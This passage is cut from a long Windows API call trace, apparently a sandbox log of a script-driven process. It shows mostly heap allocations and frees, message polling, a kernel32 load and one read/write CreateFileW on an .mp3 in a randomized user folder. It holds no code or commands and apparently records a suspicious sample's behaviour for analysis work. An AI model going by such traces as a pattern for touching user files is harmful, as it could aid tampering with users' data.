0x75c90000 [0185.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0185.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0185.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0185.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2658 [0185.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2658, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0185.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0185.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.940] FreeLibrary (hLibModule=0x75c90000) returned 1 [0185.940] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0185.940] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.940] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0185.940] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0185.940] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0185.940] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.941] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.941] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.941] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.941] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.941] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0185.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.941] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.945] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.945] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.945] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.945] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.945] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0185.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.945] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.945] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0185.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.946] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0185.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0185.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0185.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.946] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0185.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0185.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0185.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0185.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0185.946] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0185.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0185.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0185.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd510 [0185.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd510, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0185.947] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\o8lnb5uj.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0185.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0185.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0185.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0185.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0185.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0185.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0185.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0185.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0185.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.947] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0185.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0185.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0185.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0185.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0185.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0185.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0185.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbdc290 | out: hHeap=0x8a0000) returned 1 [0185.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0185.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0185.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0185.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0185.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0185.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0185.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0185.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0185.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0185.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0185.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0185.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0185.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0185.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0185.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0185.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0185.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0185.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0185.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0185.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0185.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0185.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0185.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0185.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0185.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0185.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0185.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0185.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0185.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0185.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0185.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0185.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0185.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0185.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0185.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0185.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0185.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0185.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0185.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0185.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0185.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0185.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0185.949] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0185.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0185.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0185.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0185.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0185.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0185.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0185.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0185.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0185.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0185.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 